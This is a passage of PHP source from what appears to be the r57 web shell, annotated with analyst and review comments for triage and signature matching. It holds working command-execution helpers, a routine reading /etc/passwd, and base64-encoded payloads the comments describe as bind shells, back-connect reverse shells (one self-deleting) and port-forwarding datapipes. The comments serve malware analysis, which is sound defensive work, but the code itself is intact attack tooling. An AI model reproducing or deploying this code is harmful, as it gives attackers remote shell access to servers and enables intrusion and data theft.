@ob_end_clean();
}
// Last resort: popen() is tried directly, without a function_exists() check.
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
// Return the list of account names found in a passwd-format file, or 0 when the file could
// not be read (or is empty). A file named passwd.txt in the current working directory takes
// precedence; otherwise /etc/passwd is read.
// Triage note: a stray passwd.txt next to the script suggests an account list was staged
// by hand; /etc/passwd being read by the PHP worker is the other observable.
function get_users()
{
$users = array();
if (file_exists('passwd.txt')) {
$rows=file('passwd.txt');
} else {
$rows=file('/etc/passwd');
}
if(!$rows) return 0;
foreach ($rows as $string)
{
// The name is the text before the first ':'; lines starting with '#' are skipped.
$user = @explode(":",$string);
if(substr($string,0,1)!='#') array_push($users,$user[0]);
}
return $users;
}
/**
 * Print error message number $n from the global label table inside a one-cell HTML table.
 *
 * The label is read from $GLOBALS['lang'] under the key "<language>_err<n>"; when $txt is
 * non-empty it is appended after a space. Nothing is HTML-escaped. Always returns null.
 */
function err($n,$txt='')
{
    $opening = '<table width=100% cellpadding=0 cellspacing=0><tr><td class=main bgcolor=Black><font color=Red face=Verdana size=-2><div align=center><b>';
    $closing = '</b></div></font></td></tr></table>';
    echo $opening;
    // The lookup is done after the opening markup has been written, as in the original flow.
    $label_key = $GLOBALS['language'].'_err'.$n;
    echo $GLOBALS['lang'][$label_key];
    if (!empty($txt))
    {
        echo " ".$txt;
    }
    echo $closing;
    return null;
}
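/**
 * Format a numeric file mode as an ls-style string such as "-rwxr-xr-x".
 *
 * Returns 0 when $GLOBALS['unix'] is false (permission bits are not rendered on
 * non-Unix hosts). Otherwise returns a 10-character string: one file-type
 * character followed by the owner, group and world rwx triplets, with the
 * setuid/setgid/sticky bits shown as s/S and t/T in the execute positions.
 *
 * Fix: the file type is a 4-bit field, not a set of independent flags. Testing
 * single bits in sequence misreported block devices, symlinks and sockets
 * (0xA000 matched the 0x2000 test and was shown as 'c', for example), so the
 * field is now masked with 0xF000 and compared as a whole.
 */
function perms($mode)
{
    if (!$GLOBALS['unix']) return 0;
    switch ($mode & 0xF000)
    {
        case 0x1000: $type = 'p'; break; // FIFO
        case 0x2000: $type = 'c'; break; // character device
        case 0x4000: $type = 'd'; break; // directory
        case 0x6000: $type = 'b'; break; // block device
        case 0x8000: $type = '-'; break; // regular file
        case 0xA000: $type = 'l'; break; // symbolic link
        case 0xC000: $type = 's'; break; // socket
        default:     $type = 'u';        // unknown
    }
    $owner["read"]    = ($mode & 00400) ? 'r' : '-';
    $owner["write"]   = ($mode & 00200) ? 'w' : '-';
    $owner["execute"] = ($mode & 00100) ? 'x' : '-';
    $group["read"]    = ($mode & 00040) ? 'r' : '-';
    $group["write"]   = ($mode & 00020) ? 'w' : '-';
    $group["execute"] = ($mode & 00010) ? 'x' : '-';
    $world["read"]    = ($mode & 00004) ? 'r' : '-';
    $world["write"]   = ($mode & 00002) ? 'w' : '-';
    $world["execute"] = ($mode & 00001) ? 'x' : '-';
    // Special bits replace the execute character: lower case when execute is also set.
    if ($mode & 0x800) $owner["execute"] = ($owner['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x400) $group["execute"] = ($group['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x200) $world["execute"] = ($world['execute'] == 'x') ? 't' : 'T';
    $s  = sprintf("%1s", $type);
    $s .= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
    $s .= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
    $s .= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
    return trim($s);
}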
/**
 * Assemble an HTML <input> tag as a string.
 *
 * The size attribute is emitted only when $size is non-zero, and " checked" only when
 * $checked is truthy. Only the value attribute is quoted.
 * NOTE(review): none of the arguments is HTML-escaped here, so callers that pass
 * request data through this helper reflect it into the page as-is.
 */
function in($type,$name,$size,$value,$checked=0)
{
    $size_attr = ($size != 0) ? "size=".$size." " : "";
    $checked_attr = $checked ? " checked" : "";
    return "<input type=".$type." name=".$name." ".$size_attr."value=\"".$value."\"".$checked_attr.">";
}
// Resolve the program name $pr to a path by running `which` through ex(); when that yields
// nothing, the bare name is returned unchanged.
// NOTE(review): $pr is interpolated into the command line without quoting, and the result
// is returned exactly as the command printed it (no trimming is done here).
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
// Write the base64-decoded form of $text to the file $fname, truncating any existing file
// (mode "w"). When the file cannot be opened, err(0) prints the "can't write" message and
// nothing is written.
// Triage note: this is the helper that turns an embedded base64 string into a file on disk;
// presumably it is used for the $port_bind_* payloads (the callers are outside this part of
// the file). New files created by the web-server account shortly after a request to the
// script are the observable.
function cf($fname,$text)
{
$w_file=@fopen($fname,"w") or err(0);
if($w_file)
{
@fputs($w_file,base64_decode($text));
@fclose($w_file);
}
}
/**
 * Build one two-column HTML table row.
 *
 * $l is the width of the left cell in percent; $t1 is placed right-aligned in the left
 * cell and $t2 left-aligned in the right cell. Neither text is HTML-escaped.
 */
function sr($l,$t1,$t2)
{
    $left_cell  = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
    $right_cell = "<td class=td1 align=left>".$t2."</td>";
    return "<tr class=tr1>".$left_cell.$right_cell."</tr>";
}
// Defined only when no view_size() exists yet.
if (!@function_exists("view_size"))
{
    /**
     * Format a byte count for display: the largest fitting unit of GB, MB or KB
     * (powers of 1024) rounded to two decimals, or plain bytes with a " B" suffix.
     */
    function view_size($size)
    {
        $units = array(" GB" => 1073741824, " MB" => 1048576, " KB" => 1024);
        foreach ($units as $suffix => $divisor)
        {
            if ($size >= $divisor)
            {
                return @round($size / $divisor * 100) / 100 . $suffix;
            }
        }
        return $size . " B";
    }
}
// Recursively collect the paths of all files under $dir and return them as a flat array.
// $types is an optional ';'-separated list of extensions including the dot; when given,
// only files whose extension is in the list are returned. Directories that cannot be opened
// are skipped silently (every call is prefixed with @).
// NOTE(review): there is no depth limit and is_dir() follows symbolic links, so a link
// pointing back up the tree could make the recursion loop; confirm before reusing.
function DirFilesR($dir,$types='')
{
$files = Array();
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(@is_dir($dir."/".$file))
$files = @array_merge($files,DirFilesR($dir."/".$file,$types));
else
{
// Extension = everything from the last '.' to the end of the name.
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if($types)
{
if(@in_array($ext,explode(';',$types)))
$files[] = $dir."/".$file;
}
else
$files[] = $dir."/".$file;
}
}
}
@closedir($handle);
}
return $files;
}
// Text search over a set of files: collects the file list at construction time, then
// SearchText() scans each file line by line and records the matching lines.
class SearchResult
{
var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
// NOTE(review): this declared name is misspelled; the methods below use FileMatchesCount,
// which is therefore created as an undeclared property.
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
// Old-style constructor (method named after the class). $dir is a ';'-separated list of
// directories, $text the search words, $filter an optional extension list for DirFilesR().
// NOTE(review): PHP 8 no longer treats a same-named method as a constructor, so on such a
// runtime `new SearchResult(...)` would leave these fields unset; confirm the target version.
function SearchResult($dir,$text,$filter='')
{
$dirs = @explode(";",$dir);
$this->FilesToSearch = Array();
for($a=0;$a<count($dirs);$a++)
$this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
// Plain accessors for the fields filled by the constructor and SearchText().
function GetFilesTotal() { return $this->FilesTotal; }
function GetTitles() { return $this->titles; }
function GetTimeTotal() { return $this->TimeTotal; }
function GetMatchesCount() { return $this->MatchesCount; }
function GetFileMatchesCount() { return $this->FileMatchesCount; }
function GetResultFiles() { return $this->ResultFiles; }
// Scan every collected file. The search text is split on spaces and the words are joined
// into one alternation group; $phrase wraps each word in \b word boundaries, and the
// pattern is case-insensitive unless $case is truthy.
// NOTE(review): the words are placed into the pattern without preg_quote(), so regex
// metacharacters in the search text are interpreted and a '/' ends the pattern early.
function SearchText($phrase=0,$case=0) {
$qq = @explode(' ',$this->text);
$delim = '|';
if($phrase)
foreach($qq as $k=>$v)
$qq[$k] = '\b'.$v.'\b';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if(!$case)
$pattern .= 'i';
foreach($this->FilesToSearch as $k=>$filename)
{
$this->FileMatchesCount[$filename] = 0;
// NOTE(review): `@next` is an expression, not a loop-control statement; an unreadable
// file is not skipped by it, the inner loop just has nothing to iterate.
$FileStrings = @file($filename) or @next;
for($a=0;$a<@count($FileStrings);$a++)
{
$count = 0;
// Each line is trimmed and stripped of tags before matching.
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if(($count = @preg_match_all($pattern,$CurString,$aa)))
{
// Matches are wrapped in a highlighting SPAN; the line is stored under its 1-based number.
$CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
$this->ResultFiles[$filename][$a+1] = $CurString;
$this->MatchesCount += $count;
$this->FileMatchesCount[$filename] += $count;
}
}
}
// Elapsed time since construction, rounded to four decimals.
$this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
}
}
// Returns the current Unix time as a float with microsecond precision by
// splitting the "usec sec" string that microtime() returns and adding the parts.
function getmicrotime()
{
list($usec,$sec) = @explode(" ",@microtime());
return ((float)$usec + (float)$sec);
}
// Analyst note: embedded payload, base64 of C source text. Decoded, it is a TCP
// listener that prompts with "Password:", compares the reply with its second
// argument and then starts an interactive /bin/bash on the connection; it
// contains the literal "welcome to r57 shell". The shell writes it to
// /tmp/bd.c and compiles it to /tmp/bd further down. Kept byte-identical so
// that string and hash based signatures for this sample stay valid.
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
// Analyst note: embedded payload, base64 of a Perl script. Decoded, it listens
// on the TCP port given as its only argument and attaches "/bin/bash -i" to
// each accepted connection; unlike the C variant it has no password prompt.
// The shell writes it to /tmp/bdpl further down. Kept byte-identical.
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
// Analyst note: embedded payload, base64 of a Perl script. Decoded, it makes an
// outbound TCP connection to the host and port given as arguments and runs
// /bin/sh over it after printing `uname -a` and `id`. It assigns "lynx" to $0,
// so the process can appear under that name in process listings; a "lynx"
// process whose interpreter is perl and whose parent is the web server is
// worth checking. Written to /tmp/back further down. Kept byte-identical.
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
// Analyst note: embedded payload, base64 of C source text. Decoded, it
// daemonizes, connects out to the address and port given as arguments, wipes
// those arguments from argv, runs "rm -f" on its own argv[0] and then execs
// /bin/sh on the socket. Because the binary deletes itself, /tmp/backc may be
// missing from disk while the process is still running; check running
// processes whose executable is reported as deleted, not just /tmp.
// Written to /tmp/back.c and compiled further down. Kept byte-identical.
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
$shellvic="QWx1Q2FS==";
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
